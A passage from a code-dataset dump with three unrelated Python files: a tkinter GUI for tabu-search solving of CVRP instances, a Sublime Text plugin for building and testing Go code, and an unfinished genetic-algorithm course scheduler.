CVRP\nfrom Vertice import Vertice\nimport tkinter.filedialog\nimport os\nfrom tkinter import ttk\nfrom os import 
listdir\nfrom os.path import isfile, join\nimport ntpath\nimport numpy as np\n\nclass Ventana(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.geometry(\"450x500+350+130\")\n self.title(\"Buqueda tabu aplicada a CVRP\")\n self.__demanda = []\n self.__nroVehiculos = []\n self.__nro = 0\n self.__openFolder = False\n\n self.__tabs = ttk.Notebook(self)\n self.elementosGUI()\n self.__frames = []\n\n self.barraMenus()\n \n def barraMenus(self):\n self.__menu = tk.Menu(self)\n self.__menuArchivo = tk.Menu(self.__menu)\n self.__menuArchivo.add_command(label=\"Open File\", command=self.openFile)\n self.__menu.add_cascade(label=\"File\", menu=self.__menuArchivo)\n self.__menuArchivo.add_command(label=\"Open Folder\", command=self.openFolder)\n\n self.config(menu = self.__menu)\n \n def elementosGUI(self):\n self.__labelSolInicial = []\n self.__labelEstadoGrafo = []\n self.__eSolInicial = []\n self.__combo1 = []\n self.__eOpt = []\n self.__comboOpt = []\n self.__labelTenureADD = []\n self.__labelTenureDROP = []\n self.__boxADD = []\n self.__spinboxDROP = []\n self.__spinboxADD = []\n self.__boxDROP = []\n self.__labelTiempoEjecucion = []\n self.__eTime = []\n self.__entryTiempoEjecucion = []\n self.__labelTEmin = []\n self.__areaDatos = []\n self.__label_RecomiendacTiempo = []\n self.__matrizDistancias = []\n self.__optimo = []\n self.__capacidad = []\n self.__cantidadResolver =[]\n self.__labelCantidadResolver = []\n self.__labelRecomienda =[]\n self.__spinboxCantidadResolver = []\n self.__labelPorcentaje = []\n self.__ePorcentaje = []\n self.__entryPorcentaje = []\n self.__labelPorc = []\n\n def menuConfig(self,frame,i):\n self.__labelEstadoGrafo.append(tk.Label(frame, text = \"No se ha cargado Grafo\"))\n self.__labelEstadoGrafo[i].place(relx=0.4,rely=0.05)\n #Pestañas \n \n #Solucion inicial\n self.__labelSolInicial.append(tk.Label(frame, text = \"Solucion inicial\"))\n self.__labelSolInicial[i].place(relx=0.2, rely=0.15)\n \n self.__combo1list=['Clark & Wright','Vecino mas cercano','Secuencial']\n self.__eSolInicial.append(tk.StringVar())\n self.__combo1.append(ttk.Combobox(frame, textvariable=self.__eSolInicial[i], values=self.__combo1list, width = 29, state = \"disabled\"))\n self.__combo1[i].place(relx=0.4, rely=0.15)\n \n #Tenure ADD\n self.__labelTenureADD.append(tk.Label(frame, text = \"Tenure ADD\"))\n self.__labelTenureADD[i].place(relx=0.2, rely=0.25)\n self.__boxADD.append(tk.IntVar())\n self.__spinboxADD.append(tk.Spinbox(frame, from_ = 1, to = 100, width = 5, state = \"disabled\", textvariable = self.__boxADD))\n self.__spinboxADD[i].place(relx=0.35, rely=0.25)\n\n #Tenure DROP\n self.__labelTenureDROP.append(tk.Label(frame, text = \"Tenure DROP\"))\n self.__labelTenureDROP[i].place(relx=0.50, rely=0.25)\n self.__boxDROP.append(tk.IntVar())\n self.__spinboxDROP.append(tk.Spinbox(frame, from_ = 1, to = 100, width = 5, state = \"disabled\", textvariable = self.__boxDROP))\n self.__spinboxDROP[i].place(relx=0.70, rely=0.25)\n \n #Condicion de parada (Tiempo)\n self.__labelTiempoEjecucion.append(tk.Label(frame, text = \"Tiempo de ejecución\"))\n self.__labelTiempoEjecucion[i].place(relx=0.2, rely=0.4)\n self.__eTime.append(tk.StringVar())\n self.__entryTiempoEjecucion.append(tk.Entry(frame, textvariable = self.__eTime, width = 25, state = \"disabled\"))\n self.__entryTiempoEjecucion[i].place(relx=0.5, rely=0.4,relwidth=0.20)\n self.__labelTEmin.append(tk.Label(frame, text = \"(min)\"))\n self.__labelTEmin[i].place(relx=0.75, rely=0.4)\n\n #Condicion de parada (Porcentaje)\n 
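        # Added note ("Condicion de parada" = stopping condition): this entry and the
        # time entry above are created disabled and are switched to "normal" with
        # recommended defaults in calcularDatos() once an instance is loaded; the
        # percentage appears to act as a stop threshold relative to the known optimum
        # parsed from the instance's COMMENT line.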
self.__labelPorcentaje.append(tk.Label(frame, text = \"Porcentaje de parada\"))\n self.__labelPorcentaje[i].place(relx=0.2, rely=0.5)\n self.__ePorcentaje.append(tk.StringVar())\n self.__entryPorcentaje.append(tk.Entry(frame, textvariable = self.__ePorcentaje, width = 25, state = \"disabled\"))\n self.__entryPorcentaje[i].place(relx=0.5, rely=0.5,relwidth=0.20)\n self.__labelPorc.append(tk.Label(frame, text = \"%\"))\n self.__labelPorc[i].place(relx=0.75, rely=0.5)\n\n #Cantidad de Veces a resolver \n self.__labelCantidadResolver.append(tk.Label(frame, text= \"Cantidad de Veces a resolver\"))\n self.__labelCantidadResolver[i].place(relx=0.13, rely = 0.60)\n self.__cantidadResolver.append(tk.IntVar())\n self.__spinboxCantidadResolver.append(tk.Spinbox(frame, from_ = 1, to = 100, width = 5, state = \"readonly\", textvariable = self.__cantidadResolver[i]))\n self.__spinboxCantidadResolver[i].place(relx=0.5, rely=0.60)\n\n def cargarDatos(self):\n self.__myFolder = os.path.basename(self.__mypath)\n for i in range(0,len(self.__listaInstancias)):\n self.__nombreArchivo = self.__listaInstancias[i]\n print(\"Se resolverá \"+ str(self.__cantidadResolver[i].get())+\" veces \"+ self.__nombreArchivo)\n for j in range(0,self.__cantidadResolver[i].get()):\n print(\"RESOLVIENDO ------------------> \"+str(self.__nombreArchivo))\n self.__cvrp = CVRP(self.__matrizDistancias[i], self.__demanda[i], self.__nroVehiculos[i], self.__capacidad[i],\n self.__nombreArchivo+\"_\"+str(self.__eTime[i].get())+\"min\", self.__myFolder, self.getSolucionInicial(self.__eSolInicial[i].get()),\n self.__boxADD[i].get(), self.__boxDROP[i].get(), self.__eTime[i].get(), self.__ePorcentaje[i].get(), self.__optimo[i])\n j\n\n def getSolucionInicial(self,value):\n return self.__combo1list.index(value)\n\n def calcularDatos(self,i):\n if(self.__openFolder):\n self.__labelEstadoGrafo[i].configure(text = \"Grafos Cargados\")\n else:\n self.__labelEstadoGrafo[i].configure(text = \"Grafo Cargado\")\n \n self.__labelRecomienda.append(tk.Label(text = \"Se recomienda los siguientes valores...\"))\n self.__labelRecomienda[i].place(relx=0.3,rely=0.05) \n \n # tenureADD = int(len(self.__matrizDistancias[i])**(1/2.0))\n # tenureDROP = int(len(self.__matrizDistancias[i])**(1/2.0))+1\n\n tenureADD = int(len(self.__matrizDistancias[i])*0.1)\n tenureDROP = int(len(self.__matrizDistancias[i])*0.1)+1\n \n self.__combo1[i].configure(state = \"readonly\")\n self.__combo1[i].set('Clark & Wright')\n \n #Tenure ADD y DROP\n self.__boxADD[i].set(tenureADD)\n self.__spinboxADD[i].configure(state = \"readonly\", textvariable=self.__boxADD[i])\n\n self.__boxDROP[i].set(tenureDROP)\n self.__spinboxDROP[i].configure(state = \"readonly\", textvariable=self.__boxDROP[i])\n \n #Tiempo\n self.__label_RecomiendacTiempo.append(tk.Label(text = \"Se recomienda como minimo\"))\n self.__label_RecomiendacTiempo[i].place(relx=0.30, rely=0.33)\n \n if(int(len(self.__matrizDistancias[i])) < 80):\n self.__eTime[i].set(1.0)\n elif(int(len(self.__matrizDistancias[i])) < 150):\n self.__eTime[i].set(3.0)\n else:\n self.__eTime[i].set(7.0)\n\n self.__entryTiempoEjecucion[i].configure(state = \"normal\", textvariable = self.__eTime[i])\n\n #Porcentaje\n self.__entryPorcentaje[i].configure(state = \"normal\", textvariable = self.__ePorcentaje[i])\n self.__ePorcentaje[i].set(0.1)\n\n return\n\n def listToString(self, s): \n str1 = \"\" \n for ele in s: \n str1 += ele \n\n return str1\n\n def tabs(self, instancias):\n for i in range(0,len(instancias)):\n print(instancias[i])\n 
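            # Added comment: one notebook tab per instance; build the frame and its
            # controls, parse the .vrp file, then fill in the recommended defaults.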
self.__frames.append(tk.Frame(self)) \n self.menuConfig(self.__frames[i],i)\n self.__tabs.add(child=self.__frames[i],text=instancias[i])\n self.cargarDesdeFile(self.__mypath+\"/\"+self.__listaInstancias[i])\n self.calcularDatos(i)\n \n self.__tabs.pack(expand=1, fill=\"both\")\n self.__Ok = tk.Button(self, text = \"Calcular\", command=self.cargarDatos, width = 10, height =2, state=\"normal\")\n self.__Ok.pack(after=self.__tabs)\n\n def openFolder(self):\n self.__mypath = tk.filedialog.askdirectory(initialdir = \".\", title='Seleccione directorio con instancias')\n self.__listaInstancias = [f for f in listdir(self.__mypath) if isfile(join(self.__mypath, f))]\n self.__openFolder = True\n print(self.__listaInstancias)\n self.tabs(self.__listaInstancias)\n self.__nombreArchivo = os.path.splitext(self.__listaInstancias[0])[0]\n print(\"Primera instancia: \"+str(self.__nombreArchivo))\n \n def openFile(self):\n self.__listaInstancias = tk.filedialog.askopenfilenames(initialdir = \".\",title = \"Seleccione Intancia/s CVRP\",filetypes = ((\"all files\",\"*.*\"),(\"VRP files\",\"*.vrp\")))\n self.__listaInstancias = list(self.__listaInstancias)\n self.__mypath = ntpath.split(self.__listaInstancias[0])[0]\n self.__listaInstancias = [ntpath.split(f)[1] for f in self.__listaInstancias]\n self.tabs(self.__listaInstancias)\n self.__nombreArchivo = os.path.splitext(os.path.basename(self.__listaInstancias[0]))[0]\n \n #Obtengo los datos de mis archivos .vrp\n def cargarDesdeFile(self,pathArchivo):\n #+-+-+-+-+-Para cargar la distancias+-+-+-+-+-+-+-+-\n archivo = open(pathArchivo,\"r\")\n lineas = archivo.readlines()\n \n #Busco la posiciones de...\n try:\n indSeccionCoord = lineas.index(\"NODE_COORD_SECTION \\n\")\n lineaEOF = lineas.index(\"DEMAND_SECTION \\n\")\n except ValueError:\n try:\n indSeccionCoord = lineas.index(\"NODE_COORD_SECTION\\n\")\n lineaEOF = lineas.index(\"DEMAND_SECTION\\n\")\n except ValueError:\n indSeccionCoord = lineas.index(\"NODE_COORD_SECTION\\t\\n\")\n lineaEOF = lineas.index(\"DEMAND_SECTION\\t\\n\")\n \n #Linea optimo y nro de vehiculos\n lineaOptimo = [x for x in lineas[0:indSeccionCoord] if re.search(r\"COMMENT+\",x)][0]\n parametros = re.findall(r\"[0-9]+\",lineaOptimo)\n \n self.__nroVehiculos.append(int(float(parametros[0])))\n self.__optimo.append(float(parametros[1]))\n\n #Cargo la capacidad\n lineaCapacidad = [x for x in lineas[0:indSeccionCoord] if re.search(r\"CAPACITY+\",x)][0]\n parametros = re.findall(r\"[0-9]+\",lineaCapacidad)\n\n self.__capacidad.append(float(parametros[0]))\n print(\"Capacidad: \"+str(self.__capacidad[-1]))\n\n #Lista donde irán las coordenadas (vertice, x, y)\n coordenadas = []\n #Separa las coordenadas en una matriz, es una lista de listas (vertice, coordA, coordB)\n for i in range(indSeccionCoord+1, lineaEOF):\n textoLinea = lineas[i]\n textoLinea = re.sub(\"\\n\", \"\", textoLinea) #Elimina los saltos de línea\n splitLinea = textoLinea.split() #Divide la línea por \" \" \n if(splitLinea[0]==\"\"):\n coordenadas.append([splitLinea[1],splitLinea[2],splitLinea[3]]) #[[v1,x1,y1], [v2,x2,y2], ...]\n else:\n coordenadas.append([splitLinea[0],splitLinea[1],splitLinea[2]]) #[[v1,x1,y1], [v2,x2,y2], ...]\n #print(\"coordenadas: \"+str(coordenadas))\n self.cargaMatrizDistancias(coordenadas)\n \n #+-+-+-+-+-+-+-Para cargar la demanda+-+-+-+-+-+-+-\n seccionDemanda = [x for x in lineas[indSeccionCoord:] if re.findall(r\"DEMAND_SECTION+\",x)][0]\n indSeccionDemanda = lineas.index(seccionDemanda)\n \n seccionEOF = [x for x in 
lineas[indSeccionCoord:] if re.findall(r\"DEPOT_SECTION+\",x)][0]\n indLineaEOF = lineas.index(seccionEOF)\n\n demanda = []\n for i in range(indSeccionDemanda+1, indLineaEOF):\n textoLinea = lineas[i]\n textoLinea = re.sub(\"\\n\", \"\", textoLinea) #Elimina los saltos de línea\n splitLinea = textoLinea.split() #Divide la línea por \" \" \n try:\n demanda.append(float(splitLinea[1]))\n except:\n splitLinea = textoLinea.split()\n demanda.append(float(splitLinea[1]))\n #print(str(demanda))\n self.__demanda.append(demanda)\n \n def cargaMatrizDistancias(self, coordenadas):\n matriz = []\n #Arma la matriz de distancias. Calculo la distancia euclidea\n for coordRow in coordenadas:\n fila = [] \n for coordCol in coordenadas:\n x1 = float(coordRow[1])\n y1 = float(coordRow[2])\n x2 = float(coordCol[1])\n y2 = float(coordCol[2])\n dist = self.distancia(x1,y1,x2,y2)\n \n #Para el primer caso. Calculando la distancia euclidea entre si mismo da 0\n if(dist == 0 and float(coordRow[0])==float(coordCol[0])):\n dist = 999999999999\n fila.append(dist)\n\n #print(\"Fila: \"+str(fila)) \n matriz.append(fila)\n self.__matrizDistancias.append(np.array(matriz))\n\n def distancia(self, x1,y1,x2,y2):\n return round(math.sqrt((x1-x2)**2+(y1-y2)**2),3)\n \nventana = Ventana()\nventana.mainloop()","sub_path":"CVRP con dict/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":13865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360500815","text":"\nimport sys\nimport os\nfrom GoGdb3.sublimegdb import project_path\nfrom GoGdb3.sublimegdb import project_pathv\nfrom GoGdb3.sublimegdb import pkg_pathv\nfrom GoGdb3.sublimegdb import pkg_namev\nfrom GoGdb3.sublimegdb import GoBuilder\nfrom GoGdb3.sublimegdb import GDBView\nfrom GoGdb3.sublimegdb import get_setting\nfrom GoGdb3.sublimegdb import CmdThread\nfrom GoGdb3.sublimegdb import n_console_view\nimport re\nimport sublime\nimport sublime_plugin\nimport threading \nimport subprocess\nimport time\n\ndef plugin_loaded():\n\tfrom GoSublime.gosubl import gs\n\tfrom GoSublime.gosubl import mg9\n\timport gs9o\nDOMAIN = 'GssTest'\n\nTEST_PAT = re.compile(r'^((Test|Example|Benchmark)\\w*)')\nw_builders={}\nclass GssShowConsole(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\tprint(n_console_view.listener(self.window))\n\t\treturn n_console_view.listener(self.window)==None\n\tdef run(self):\n\t\tsublime.active_window().set_layout(\n\t\t\t{\n\t\t\t\"cols\": [0.0, 1.0],\n\t\t\t\"rows\": [0.0, 0.75, 1.0],\n\t\t\t\"cells\": [[0, 0, 1, 1],[0, 1, 1, 2]]\n\t\t\t})\n\t\tn_console_view.ShowConsoleView(self.window)\nclass GssShowDebug(sublime_plugin.TextCommand):\n\tdef run(self,edit):\n\t\t\"这是中文\".encode(\"utf-8\").decode(\"utf-8\")\n\t\tprint(\"runnnnn\")\nclass GssGs9oAddLine(sublime_plugin.TextCommand):\n\tdef run(self,edit,line):\n\t\timport gs9o\n\t\twin = self.view.window()\n\t\twid = win.id()\n\t\twd=gs9o.active_wd(win)\n\t\tid = gs9o._wdid(wd)\n\t\tst = gs9o.stash.setdefault(wid, {})\n\t\tv = st.get(id)\n\t\tif v is None:\n\t\t\tv = win.get_output_panel(id)\n\t\t\tst[id] = v\n\t\tv.insert(edit, v.size(), line)\n\t\tv.show(v.size())\nclass GssGs9oClear(sublime_plugin.TextCommand):\n\tdef run(self,edit):\n\t\timport gs9o\n\t\twin = self.view.window()\n\t\twid = win.id()\n\t\twd=gs9o.active_wd(win)\n\t\tid = gs9o._wdid(wd)\n\t\tst = gs9o.stash.setdefault(wid, {})\n\t\tv = st.get(id)\n\t\tif v is None:\n\t\t\tv = win.get_output_panel(id)\n\t\t\tst[id] = v\n\t\tv.replace(edit,sublime.Region(0, 
v.size()),\"\")\n\nclass OnSaveListener(sublime_plugin.EventListener):\n\tdef __init__(self):\n\t\tself.loading=False\n\tdef is_enabled(self):\n\t\taview=self.window.active_view()\n\t\tapath=aview.file_name()\n\t\treturn apath is not None and apath.find(\".go\")==len(apath)-3\n\tdef on_post_save(self,view):\n\t\tif self.loading:\n\t\t\treturn\n\t\tppath=project_pathv(view)\n\t\tpkg_n=pkg_pathv(ppath,view)\n\t\tif pkg_n==\"\":\n\t\t\treturn\n\t\tprint(\"on save build:\",pkg_n)\n\t\tapath=view.file_name()\n\t\timain=apath.find(\"main\")==len(apath)-4\n\t\tif imain:\n\t\t\treturn\n\t\tself.loading=True\n\t\tcmd=CmdThread(\"go install \"+pkg_n,ppath,None,None)\n\t\tcmd.start()\n\t\tcmd.join()\n\t\tself.loading=False\n\nclass GssSaveListener(sublime_plugin.EventListener):\n\tdef __init__(self):\n\t\tself.loading=False\n\tdef on_post_save(self,view):\n\t\tif self.loading and self.loading:\n\t\t\treturn\n\t\tself.loading=True\n\t\tapath=view.file_name()\n\t\tif apath.find(\".go\")!=len(apath)-3:\n\t\t\treturn\n\t\tapath=view.file_name()\n\t\titest=apath.find(\"_test.go\")==len(apath)-8\n\t\twid=view.window().id()\n\t\tg_builder=GoBuilder()\n\t\to_b=None\n\t\tif wid in w_builders:\n\t\t\to_b=w_builders[wid]\n\t\tif o_b is not None and o_b.is_running():\n\t\t\tg_builder.initEnv(itest,\"\",view,None)\n\t\telse:\n\t\t\tg_builder.initEnv(itest,\"\",view,n_console_view)\n\t\t# g_builder.showLView()\n\t\tg_builder.build(False)\n\t\tself.loading=False\n\tdef on_close(self,view):\n\t\tif view.name()==\"Console\":\n\t\t\tn_console_view.rm_listener(sublime.active_window())\n\t\t\tsublime.set_timeout(self.resetLayout, 1)\n\t\t\t# n_console_view.view=None\n\tdef resetLayout(self):\n\t\tsublime.active_window().set_layout(\n {\n \t\"cols\": [0.0, 1.0],\n \"rows\": [0.0, 1.0],\n \"cells\": [[0, 0, 1, 1]]\n }\n )\n\nclass GssStopCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\treturn g_builder is not None and g_builder.is_running()\n\tdef run(self):\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\tif g_builder is not None:\n\t\t\tg_builder.bstop()\n\t\t\tg_builder.rstop()\nclass GssRunCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\taview=self.window.active_view()\n\t\tapath=aview.file_name()\n\t\treturn apath is not None and apath.find(\".go\")==len(apath)-3\n\tdef run(self,debug=False):\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\tif (g_builder is not None) and (g_builder.is_running()):\n\t\t\ttview=self.window.active_view()\n\t\t\tn_console_view.add_line(tview,\"Builder already running\\n\")\n\t\t\treturn\n\t\taview=self.window.active_view()\n\t\tapath=aview.file_name()\n\t\tif apath.find(\"_test.go\")==len(apath)-8:\n\t\t\tself.window.run_command(\"gss_test\")\n\t\t\treturn\n\t\tg_builder=GoBuilder()\n\t\tg_builder.initEnv(False,\"\",self.window.active_view(),n_console_view)\n\t\tw_builders[wid]=g_builder\n\t\tg_builder.run()\n\t\t# aview.run_command('gs9o_open', {'run': ['sh',gb.sbinp(),gb.args],'wd': project_path(self.window)})\n\t\t\nclass GssTestCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\tfrom GoSublime.gosubl import gs\n\t\treturn gs.is_go_source_view(self.window.active_view())\n\tdef run(self,debug=False):\n\t\tfrom GoSublime.gosubl import 
gs\n\t\tfrom GoSublime.gosubl import mg9\n\t\tglobal w_builders\n\t\tg_builder=None\n\t\twid=self.window.id()\n\t\tif wid in w_builders:\n\t\t\tg_builder=w_builders[wid]\n\t\tif (g_builder is not None) and (g_builder.is_running()):\n\t\t\tg_builder.showLView()\n\t\t\treturn\n\t\tpkg_dir = ''\n\t\tdef f(res, err):\n\t\t\tif err:\n\t\t\t\tgs.notify(DOMAIN, err)\n\t\t\t\treturn\n\t\t\tmats = {}\n\t\t\targs = {}\n\t\t\tdecls = res.get('file_decls', [])\n\t\t\tdecls.extend(res.get('pkg_decls', []))\n\t\t\tfor d in decls:\n\t\t\t\tname = d['name']\n\t\t\t\tprefix, _ = match_prefix_name(name)\n\t\t\t\tif prefix and d['kind'].index('func')>-1 and d['repr'] == '':\n\t\t\t\t\tmats[True] = prefix\n\t\t\t\t\targs[name] = name\n\n\t\t\tnames = sorted(args.keys())\n\t\t\tents = ['Run all tests and examples']\n\t\t\tfor k in ['Test', 'Benchmark', 'Example']:\n\t\t\t\tif mats.get(k):\n\t\t\t\t\ts = 'Run %ss Only' % k\n\t\t\t\t\tents.append(s)\n\t\t\t\t\tif k == 'Benchmark':\n\t\t\t\t\t\targs[s] = ['-test.run=none', '-test.bench=\"%s.*\"' % k]\n\t\t\t\t\telse:\n\t\t\t\t\t\targs[s] = ['-test.run=\"%s.*\"' % k]\n\n\t\t\tfor k in names:\n\t\t\t\tents.append(k)\n\t\t\t\tif k.startswith('Benchmark'):\n\t\t\t\t\targs[k] = ['-test.run=none', '-test.bench=\"^%s$\"' % k]\n\t\t\t\telse:\n\t\t\t\t\targs[k] = ['-test.run=^%s$' % k]\n\n\t\t\tdef cb(i, win):\n\t\t\t\tif i >= 0:\n\t\t\t\t\ta = args.get(ents[i], [])\n\t\t\t\t\tsargs=\"\"\n\t\t\t\t\tif len(a)>0:\n\t\t\t\t\t\tsargs=a[0]\n\t\t\t\t\t# print sargs\n\t\t\t\t\tif debug:\n\t\t\t\t\t\twin.run_command('gdb_launch', {'test':True,'trun':sargs})\n\t\t\t\t\telse:\n\t\t\t\t\t\tglobal g_builder\n\t\t\t\t\t\tg_builder=GoBuilder()\n\t\t\t\t\t\tg_builder.initEnv(True,sargs,self.window.active_view(),n_console_view)\n\t\t\t\t\t\tg_builder.rcwd=pkg_dir\n\t\t\t\t\t\tg_builder.run()\n\n\t\t\tgs.show_quick_panel(ents, cb)\n\n\t\twin, view = gs.win_view(None, self.window)\n\t\tif view is None:\n\t\t\treturn\n\n\t\tvfn = gs.view_fn(view)\n\t\tsrc = gs.view_src(view)\n\t\tif view.file_name():\n\t\t\tpkg_dir = os.path.dirname(view.file_name())\n\n\t\tmg9.declarations(vfn, src, pkg_dir, f)\n\n\ndef match_prefix_name(s):\n\tm = TEST_PAT.match(s)\n\treturn (m.group(2), m.group(1)) if m else ('', '')\n\ndef handle_action(view, action):\n\tfn = view.file_name()\n\tprefix, name = match_prefix_name(view.substr(view.word(gs.sel(view))))\n\tok = prefix and fn and fn.endswith('_test.go')\n\tif ok:\n\t\tif action == 'right-click':\n\t\t\tpat = '^%s.*' % prefix\n\t\telse:\n\t\t\tpat = '^%s$' % name\n\n\t\tif prefix == 'Benchmark':\n\t\t\tcmd = ['go', 'test', '-test.run=none', '-test.bench=\"%s\"' % pat]\n\t\telse:\n\t\t\tcmd = ['go', 'test', '-test.run=\"%s\"' % pat]\n\n\t\tview.run_command('gs9o_open', {'run': cmd})\n\n\treturn ok\n","sub_path":"gsstest.py","file_name":"gsstest.py","file_ext":"py","file_size_in_byte":7580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451151324","text":"import random \nimport time\nimport copy\n\nNUMBER_OF_SCHEDULES = 100\nNUMBER_OF_GENERATIONS = 10\nMAX_NUMBER_OF_SCHEDULES = 200\nOUTPUT_FILE_NAME = \"out.txt\"\n\ndef convertListToInt(li):\n\tnewli = []\n\tfor x in li:\n\t\tnewli.append(int(x))\n\treturn newli\n\nclass Course:\n\tdef __init__(self, courseId, prof):\n\t\tself.courseId = courseId\n\t\tself.prof = prof\n\n\tdef getProf(self):\n\t\treturn self.prof\n\n\tdef getCourseId(self):\n\t\treturn self.courseId\n\nclass Schedule:\n\tdef __init__(self, days, timeSlots, courses=[]):\n\t\tself.plan = 
[]\n\t\tself.days = days\n\t\tself.timeSlots = timeSlots\n\t\tself.sumHappiness = 0\n\t\tself.sumSadness = 0\n\t\t# self.happiness = happiness\n\t\t# self.sadness = sadness\n\t\tself.courses = courses[:]\n\t\tself.makeEmptyPlan()\n\t\tself.createPlan()\n\t\n\tdef gettimeSlots(self):\n\t\treturn self.timeSlots\n\t\n\tdef getdays(self):\n\t\treturn self.days\n\n\tdef makeEmptyPlan(self):\t\t\n\t\tfor _ in range(self.days):\n\t\t\tline = []\n\t\t\tfor _ in range(self.timeSlots):\n\t\t\t\tline.append([Course(-1, -1)])\n\t\t\tself.plan.append(line)\n\n\tdef PlaceInFirstEmptySpace(self, index):\n\t\tfor day_ in range(len(self.plan)):\n\t\t\tfor timeSlot_ in range(len(self.plan[0])):\n\t\t\t\tif self.plan[day_][timeSlot_][0].getCourseId()==-1:\n\t\t\t\t\tself.plan[day_][timeSlot_][0] = self.courses[index]\n\t\t\t\t\treturn 1\n\t\treturn -1\n\n\n\tdef hasConflict(self, index, courseList = []):\n\t\tfor item in courseList:\n\t\t\tif item.getProf() == self.courses[index].getProf():\n\t\t\t\treturn True\n\t\treturn False \n\n\n\tdef putInRandomPossiblePlace(self, index):\n\t\ttry_times = 0\n\t\twhile try_times<20:\n\t\t\tday_ = int((random.random())*100)%(self.days)\n\t\t\ttimeSlot_ = int((random.random())*100)%(self.timeSlots)\n\t\t\tif self.hasConflict(index, self.plan[day_][timeSlot_])==False:\n\t\t\t\tself.plan[day_][timeSlot_].append(self.courses[index])\n\t\t\t\treturn 1\n\t\t\ttry_times +=1\n\n\t\treturn -1 \n\t\t\t\n\n\tdef createPlan(self):\n\t\tli = []\n\t\twhile len(self.courses)>0:\n\t\t\tindex = int((random.random())*100)%(len(self.courses))\n\t\t\tif (self.courses[index].getCourseId() in li)==False:\n\t\t\t\temptySpace = self.PlaceInFirstEmptySpace(index)\n\t\t\t\tif emptySpace==-1:\n\t\t\t\t\tbreak\n\t\t\t\tli.append(self.courses[index].getCourseId())\n\t\t\t#self.sumHappiness += self.happiness[self.courses[index].getCourseId()-1]\n\t\t\tdel self.courses[index]\n\t\twhile len(self.courses)>0:\n\t\t\tindex = int((random.random())*100)%(len(self.courses))\n\t\t\tif (self.courses[index].getCourseId() in li)==False:\n\t\t\t\temptySpace = self.putInRandomPossiblePlace(index)\n\t\t\t\tif emptySpace!=-1:\n\t\t\t\t\t#print(\"Can't Have Course \"+str(self.courses[index].getCourseId())+\" This Semester\")\n\t\t\t\t\tli.append(self.courses[index].getCourseId())\n\t\t\t\t# else:\n\t\t\t\t\t#self.sumHappiness += self.happiness[self.courses[index].getCourseId()-1]\n\t\t\tdel self.courses[index]\n\n\n\tdef fitness(self ,happiness = [] , sadness = []):\n\t\tself.sumHappiness = 0\n\t\tself.sumSadness = 0\n\t\tfor d in self.plan:\n\t\t\tfor t in d:\n\t\t\t\tfor ncindex in range(len(t)):\n\t\t\t\t\tif t[ncindex].getCourseId() != -1:\n\t\t\t\t\t\tself.sumHappiness += int(happiness[t[ncindex].getCourseId()-1])\n\t\t\t\t\t\tfor nrindex in range(ncindex+1, len(t)):\n\t\t\t\t\t\t\tif t[nrindex].getCourseId() != -1:\n\t\t\t\t\t\t\t\tif t[nrindex].getCourseId() != t[ncindex].getCourseId():\n\t\t\t\t\t\t\t\t\tself.sumSadness += int(sadness[t[ncindex].getCourseId()-1][t[nrindex].getCourseId()-1])\n\t\ttotalFitness = self.sumHappiness - self.sumSadness \n\t\treturn totalFitness\n\n\t# def sortPlan(self):\n\t# \tfor day in range(len(self.plan)):\n\t# \t\tfor time in range(len(self.plan[day])):\n\t# \t\t\tfor course in range(len(self.plan[day][time])):\n\t# \t\t\t\tfor course2 in range(0, course):\n\t# \t\t\t\t\tif self.plan[day][time][course].getCourseId() < self.plan[day][time][course2].getCourseId():\n\t# \t\t\t\t\t\ttemp = copy.deepcopy(self.plan[day][time][course])\n\t# \t\t\t\t\t\tself.plan[day][time][course] 
= copy.deepcopy(self.plan[day][time][course2])\n\t# \t\t\t\t\t\tself.plan[day][time][course] = copy.deepcopy(temp)\n\n\tdef printOutput(self, fitness):\n\t\t# self.sortPlan()\n\t\tfile = open(OUTPUT_FILE_NAME, 'w')\n\t\tfile.write(str(fitness)+'\\n')\n\t\tfor day in range(len(self.plan)):\n\t\t\tfor time in range(len(self.plan[day])):\n\t\t\t\tfor course in range(len(self.plan[day][time])):\n\t\t\t\t\tif self.plan[day][time][course].getCourseId() != -1:\n\t\t\t\t\t\tdata = str(day+1)+\" \"+str(time+1)+\" \"+str(self.plan[day][time][course].getCourseId())+\" \"+ str(self.plan[day][time][course].getProf())\n\t\t\t\t\t\tfile.write(data+'\\n')\n\t\t\t\t\t\t#print(data)\n\t\tfile.close()\n\tdef printPlan(self):\n\t\tprintedPlan = []\n\t\tfor day in self.plan:\n\t\t\tprintedPlan.append([])\n\t\t\tfor time in day:\n\t\t\t\tprintedPlan[-1].append([])\n\t\t\t\tfor course in time:\n\t\t\t\t\tif course != -1:\n\t\t\t\t\t\tprintedPlan[-1][-1].append(course.getCourseId())\n\t\t\t\t\telse:\n\t\t\t\t\t\tprintedPlan[-1][-1].append(-1)\n\t\tprint(\"Plan:\"+str(printedPlan))\n\n\n\tdef getPlan(self):\n\t\treturn self.plan\n\n\tdef getDayAndTime(self, dayRand1, timeRand1):\n\t\treturn self.plan[dayRand1][timeRand1]\n\n\tdef setPlan(self, plan):\n\t\tself.plan = copy.deepcopy(plan)\n\n\n\tdef FixDuplicate(self):\n\t\t# addedCourses = []\n\t\t# for day in value:\n\t\t# \tfor time in day:\n\t\t# \t\tfor course in time:\n\t\t# \t\t\taddedCourses.append(course.getCourseId())\n\t\t# print(addedCourses)\n\t\t# if changedPart == 0:\n\t\t# \tfor day in self.plan[len(value)-1:]:\n\t\t# \t\tfor time in day:\n\t\t# \t\t\tfor course in time:\n\t\t# \t\t\t\tif course.getCourseId() != -1:\n\t\t# \t\t\t\t\tif course.getCourseId() in 